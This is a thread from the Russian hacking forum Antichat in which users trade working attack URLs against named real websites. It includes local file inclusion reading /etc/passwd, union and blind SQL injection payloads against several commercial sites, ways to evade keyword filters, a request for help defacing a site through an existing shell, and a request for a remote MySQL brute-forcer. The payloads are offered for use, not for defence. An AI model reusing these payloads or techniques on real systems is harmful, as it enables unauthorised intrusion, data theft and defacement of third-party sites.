Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.05.2010, 12:55
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
http://www.b2match.com/smagua/index.php?file=list.php
http://www.b2match.com/smagua/index.php?file=../../../etc/passwd%00.php
Здесь есть инклуд?
|
|
|
23.05.2010, 13:48
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
http://www.b2match.com/smagua/index.php?file=./js/jquery-ui-1.7.2.custom.min.js%00.php
http://www.b2match.com/smagua/index.php?file=../info/features.htm
http://www.b2match.com/smagua/index.php?file=../info/index.php
Ты сам как думаешь, что это?
|
|
|
|
23.05.2010, 14:25
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
есть шелл зделал connect на mysql базу..
отсюда как зделать мета на саыте ?
|
|
|
|
23.05.2010, 14:29
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Имеется скуля на сайте, но всякие union, select, substring бьются на два слова (в середину вставляется пробел) и скуля соответственно не крутится. Регистр менял.
Как крутить?
P.S. Бьется юнион и селект в том случае, если в строке идет сначала union, а потом select
select+union - не бьет
uniondasdsadsadselect не бьет
uinon dadasdsadsadasda select бьет
union/*dasdasdasdsadsd*/select бьет
substring( бьет
substring *без скобки* не бьет
Последний раз редактировалось wildshaman; 23.05.2010 в 14:35..
|
|
|
|
23.05.2010, 14:41
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
Сообщение от wildshaman
Имеется скуля на сайте, но всякие union, select, substring бьются на два слова (в середину вставляется пробел) и скуля соответственно не крутится. Регистр менял.
Как крутить?
P.S. Бьется юнион и селект в том случае, если в строке идет сначала union, а потом select
select+union - не бьет
uniondasdsadsadselect не бьет
uinon dadasdsadsadasda select бьет
union/*dasdasdasdsadsd*/select бьет
substring( бьет
substring *без скобки* не бьет
ну попробовать применить http parameter pollution для обхода фильтра
вместо substring() заюзать mid(), хз чё ещё =\
з.ы. с mid'ом реально работает кстати:
...+and+mid(@@version,1,1)=5--+
Последний раз редактировалось aka_zver; 23.05.2010 в 14:51..
|
|
|
|
23.05.2010, 15:41
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Подниму свой вопрос ещо раз.
Ну жен брут для MySQL серверов на удаленном порту (3306). Не через phpmyadmin!!
|
|
|
|
23.05.2010, 16:01
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
http://previous.colop.com/sl/products/colop--printer_dater/product.php?id=-colop:11322000'+union+select+1,2,3,4,5,6,7,8,9,10, 11,12+--+
Здесь есть SQL-inj?
|
|
|
|
23.05.2010, 21:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от FlaktW
http://previous.colop.com/sl/products/colop--printer_dater/product.php?id=-colop:11322000'+union+select+1,2,3,4,5,6,7,8,9,10, 11,12+--+
Здесь есть SQL-inj?
слепая есть =>
http://previous.colop.com/sl/products/colop--printer_oval/product.php?id=colop:13026000'+and+(select substring(version(),1,1))=4/*
если пытаться вывести и первый запрос возращ. фелсе, то ошибка в XML. мб Xpath и SQLinj хз
Последний раз редактировалось Strilo4ka; 23.05.2010 в 21:47..
|
|
|
|
23.05.2010, 21:52
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от l1ght
методом научного тыка:
http://www.stockhouse.com/adredirect.asp?sid=select true
http://www.stockhouse.com/adredirect.asp?sid=+select true
http://www.stockhouse.com/adredirect.asp?sid=select+ false
=> 'select%'
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)
спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу с текушего бд Shdb
|
|
|
|
23.05.2010, 22:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от YuNi|[c
спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу с текушего бд Shdb
+where+table_schema=
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
